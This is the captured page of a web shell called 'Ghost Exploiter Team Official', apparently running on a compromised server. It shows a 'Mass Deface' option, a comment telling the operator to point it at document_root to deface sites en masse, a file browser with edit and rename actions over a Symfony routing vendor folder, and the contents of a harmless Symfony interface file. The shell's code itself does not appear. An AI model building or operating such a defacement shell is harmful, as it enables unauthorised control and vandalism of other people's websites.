Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
symfony
/
routing
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Annotation
--
ren
Attribute
--
ren
DependencyInjection
--
ren
Exception
--
ren
Generator
--
ren
Loader
--
ren
Matcher
--
ren
Requirement
--
ren
Alias.php
2.473KB
edt
ren
CHANGELOG.md
15.18KB
edt
ren
CompiledRoute.php
3.71KB
edt
ren
LICENSE
1.043KB
edt
ren
README.md
1.592KB
edt
ren
RequestContext.php
6.923KB
edt
ren
RequestContextAwareInte
...
0.519KB
edt
ren
Route.php
12.365KB
edt
ren
RouteCollection.php
10.684KB
edt
ren
RouteCompiler.php
14.254KB
edt
ren
RouteCompilerInterface.php
0.716KB
edt
ren
Router.php
11.218KB
edt
ren
RouterInterface.php
0.971KB
edt
ren
composer.json
1.199KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Routing; /** * RouteCompilerInterface is the interface that all RouteCompiler classes must implement. * * @author Fabien Potencier <fabien@symfony.com> */ interface RouteCompilerInterface { /** * Compiles the current route instance. * * @throws \LogicException If the Route cannot be compiled because the * path or host pattern is invalid */ public static function compile(Route $route): CompiledRoute; }